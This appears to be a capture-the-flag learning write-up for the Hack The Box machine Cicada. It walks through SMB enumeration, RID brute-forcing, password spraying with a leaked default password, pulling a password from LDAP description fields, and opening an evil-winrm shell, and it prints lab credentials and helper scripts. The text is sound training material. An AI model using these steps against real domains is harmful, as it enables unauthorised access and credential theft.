nmap
└─# nmap 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-28 08:07 EDT
Nmap scan report for 10.10.11.35
Host is up (0.43s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3269/tcp open globalcatLDAPssl
139 and 445 are open, so this is probably Windows, and LDAP being there suggests a domain environment.
Rescanning with
nmap -A -O 10.10.11.35
confirms it; it's just that HTB's network is sometimes congested, so the scan is slow.
Try an anonymous SMB login:
smbclient -L ////$ip -U ""
# smbclient -L -N ////$ip
Password for [WORKGROUP\]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
GPT:
When logging into an SMB service anonymously, you can usually access some default shares, which may include:
- IPC$: a share used for inter-process communication, usually open to all users.
- ADMIN$: the administrative share, usually visible only to administrators, though some configurations may allow anonymous access.
- C$: the share of the system root, also usually visible only to administrators, but possibly open to anonymous users under some configurations.
- NETLOGON: a share storing logon scripts and policies, usually only available on domain controllers.
- SYSVOL: a public folder on domain controllers, typically used for Group Policy and logon scripts.
DEV and HR were presumably created later and are worth a look, but I got the same output as above. I've somewhat forgotten how to test SMB, so let me check the writeup:
Checking SMB first using enum4linux:
enum4linux $ip
After running it I saw this line:
[+] Server 10.10.11.35 allows sessions using username '', password ''
Using impacket tools and in specific crackmapexec to identify available shares:
poetry run crackmapexec smb $ip -u "" -p "" --shares
poetry here is basically pip plus venv; my Kali threw errors with it, so I'll skip the virtual environment for now.
└─# crackmapexec smb 10.10.11.35 -u "" -p "" --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\:
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
CICADA-DC should be the domain controller; add the address to hosts first:
echo "10.10.11.35 cicada.htb CICADA-DC.cicada.htb" >> /etc/hosts
Look at HR (the earlier command was wrong):
smbclient //10.10.11.35/HR
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
Why did it become two slashes? I've somewhat forgotten; I think I covered it in an earlier post, so I'll just note it for now.
Download the file with mget:
cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
The notice contains the default password: Cicada$M6Corpb*@Lp#nZp!8
Enumerate usernames by brute-forcing RIDs through the guest account:
crackmapexec smb $ip -u "guest" -p "" --rid-brute
crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute > username.txt
Password spraying (first clean up username.txt into a plain list of names and spray with that list):
grep -oP '(?<=CICADA\\)[^ ]+' username.txt > users.txt
crackmapexec smb $ip -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
GPT:
To make sure you match emily.oscars without being affected by whatever follows it (such as parentheses), you can use a more flexible regular expression. For example, you can use .*? to match any characters up to the parenthesis:
grep -oP '(?<=CICADA\\)[^ ]+' filename
The regular expression breaks down as follows:
(?<=CICADA\\): matches the position that is preceded by CICADA\.
[^ ]+: matches one or more non-space characters, so it keeps matching through emily.oscars and stops at the space. This extracts emily.oscars regardless of whether parentheses or anything else follow it.
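An added example of my own (not code from the original post or from the writeup it cites): a small shell function that turns raw --rid-brute output into a spray list. It keeps only (SidTypeUser) rows, so group names such as Domain Admins, which a plain grep on CICADA\ would truncate to "Domain", never end up in the list. The sample output is constructed to mirror the crackmapexec row layout; apart from RID 1108 for david.orelious, which the page's ldapdomaindump output shows, the RIDs are made up.

```shell
#!/bin/sh
# Added example, not code from the original post: build a password-spray user
# list from `crackmapexec smb <ip> -u guest -p '' --rid-brute` output.

# Constructed sample of rid-brute output. The row layout follows crackmapexec;
# only RID 1108 (david.orelious) is taken from the page, the other RIDs are made up.
SAMPLE_RID_OUTPUT='SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)'

# Read rid-brute output on stdin and print one sAMAccountName per line.
# Only user objects are kept: groups and aliases are not spray targets, and a
# grep on "CICADA\\[^ ]+" would have turned "Domain Admins" into "Domain".
extract_users() {
    grep '(SidTypeUser)' | sed -n 's/.*\\\([^ ]*\) (SidTypeUser).*/\1/p' | sort -u
}

# Real usage:
#   crackmapexec smb 10.10.11.35 -u guest -p '' --rid-brute | extract_users > users.txt
# With the constructed sample:
printf '%s\n' "$SAMPLE_RID_OUTPUT" | extract_users
```

Spray the resulting users.txt with crackmapexec's --continue-on-success so the run does not stop at the first valid login; with a single shared default password more than one account may still be using it.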
The spray then yields one account:
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Test what this account can reach:
crackmapexec smb $ip -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
crackmapexec smb 10.10.11.35 -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
It showed a timeout; HTB's network is maddening:
└─# crackmapexec smb 10.10.11.35 -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: The NETBIOS connection with the remote host timed out.
Just connect directly:
smbclient //$ip -U 'michael.wrightson'
But!
└─# smbclient //10.10.11.35 -U 'michael.wrightson'
Password for [WORKGROUP\michael.wrightson]:
\10.10.11.35: Not enough '\' characters in service
GPT:
This error is usually caused by an incorrect SMB service path. With smbclient, the path format should be //<host>/<share>. Your command is missing the share name. Try:
smbclient //10.10.11.35/<share> -U 'michael.wrightson'
But then again~
GPT:
Replace <share> with the actual share name (such as IPC$ or another share). If you're not sure of the share name, you can list the available shares with:
smbclient -L //10.10.11.35 -U 'michael.wrightson'
Can't get through a day of studying without GPT (T^T)
└─# smbclient -L //10.10.11.35 -U 'michael.wrightson'
Password for [WORKGROUP\michael.wrightson]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Something new to look at now:
smbclient //10.10.11.35/SYSVOL -U 'michael.wrightson'
Password for [WORKGROUP\michael.wrightson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 22 13:40:07 2024
.. D 0 Thu Mar 14 07:08:56 2024
cicada.htb Dr 0 Thu Mar 14 07:08:56 2024
4168447 blocks of size 4096. 414427 blocks available
smb: \> mget cicada.htb/*
Got in, but couldn't find anything useful; with no experience here, let me learn from the writeup first:
Using an LDAP tool called ldapdomaindump, dump everything that can be queried with the current user's actual privileges:
ldapdomaindump 10.10.11.35 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
It downloaded a bunch of files starting with domain, which look like logs or something; let's just go all in on them first:
grep password domain*
domain_users.html:<tr><td>David Orelious</td><td>David Orelious</td><td>david.orelious</td><td> </td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,OU=Group,DC=cicada,DC=htb">Domain Users</a></td><td>03/14/24 12:17:29</td><td>10/29/24 10:30:00</td><td>10/29/24 13:02:29</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>03/14/24 12:17:29</td><td><abbr title="S-1-5-21-917908876-1423158569-3159038727-1108">1108</abbr></td><td>Just in case I forget my password is aRt$Lp#7t*VQ!3</td></tr>
Nice: david.orelious:aRt$Lp#7t*VQ!3
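An added example of my own (not from the post): rather than grepping the HTML, parse the tab-separated domain_users.grep that ldapdomaindump writes alongside its HTML and JSON output, and list every account whose description attribute is non-empty. That attribute is where this credential sat, and it is readable by any authenticated domain user, which is why a low-privileged account like michael.wrightson could see it. The column names are assumed to match the LDAP attribute names shown in ldapdomaindump's HTML table; the sample below is constructed with a subset of those columns, and only the david.orelious row carries values taken from the page.

```shell
#!/bin/sh
# Added example, not code from the original post: pull accounts with a
# non-empty description out of ldapdomaindump's tab-separated domain_users.grep.

# Constructed sample of domain_users.grep with a subset of its columns. The header
# names are assumed to be the LDAP attribute names; only the david.orelious row
# carries values taken from the page, the other rows are made up.
sample_users_grep() {
    printf 'cn\tsAMAccountName\tuserAccountControl\tobjectSid\tdescription\n'
    printf 'David Orelious\tdavid.orelious\tNORMAL_ACCOUNT, DONT_EXPIRE_PASSWD\tS-1-5-21-917908876-1423158569-3159038727-1108\tJust in case I forget my password is aRt$Lp#7t*VQ!3\n'
    printf 'Michael Wrightson\tmichael.wrightson\tNORMAL_ACCOUNT\tS-1-5-21-917908876-1423158569-3159038727-1104\t\n'
    printf 'Emily Oscars\temily.oscars\tNORMAL_ACCOUNT\tS-1-5-21-917908876-1423158569-3159038727-1601\t\n'
}

# Read the TSV on stdin and print "sAMAccountName<TAB>description" for every
# row whose description is non-empty. Columns are located by header name, so
# this survives ldapdomaindump reordering or adding columns; it exits 2 if the
# two columns it needs are missing instead of silently printing whole rows.
described_accounts() {
    awk -F '\t' '
        NR == 1 {
            for (i = 1; i <= NF; i++) col[$i] = i
            if (!("sAMAccountName" in col) || !("description" in col)) {
                print "expected sAMAccountName and description columns" > "/dev/stderr"
                exit 2
            }
            next
        }
        $col["description"] != "" { print $col["sAMAccountName"] "\t" $col["description"] }
    '
}

# Narrow the list to descriptions that smell like credentials.
credential_hints() {
    described_accounts | grep -iE 'pass|pwd|cred'
}

# Real usage: credential_hints < domain_users.grep
# With the constructed sample:
sample_users_grep | credential_hints
```

Review the full described_accounts output as well as the filtered one: descriptions that hold a password do not always contain the word.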
└─# crackmapexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 NONE [*] x64 (name:) (domain:) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 NONE [-] Connection Error: The NETBIOS connection with the remote host timed out.
Get used to it. Testing by hand, I found new credentials in DEV: emily.oscars:Q!3@Lp#M6b*7t*Vt
This account can access the file system, so:
evil-winrm -i $ip -u "emily.oscars" -p 'Q!3@Lp#M6b*7t*Vt'
gives us a shell:
evil-winrm -i 10.10.11.35 -u "emily.oscars" -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Next I'd need to pull down internal-network tooling; I'm a bit tired, so the internal part stops here while I prepare for the CTF assessment. I'll come back to this box when I need to study internal-network and domain penetration.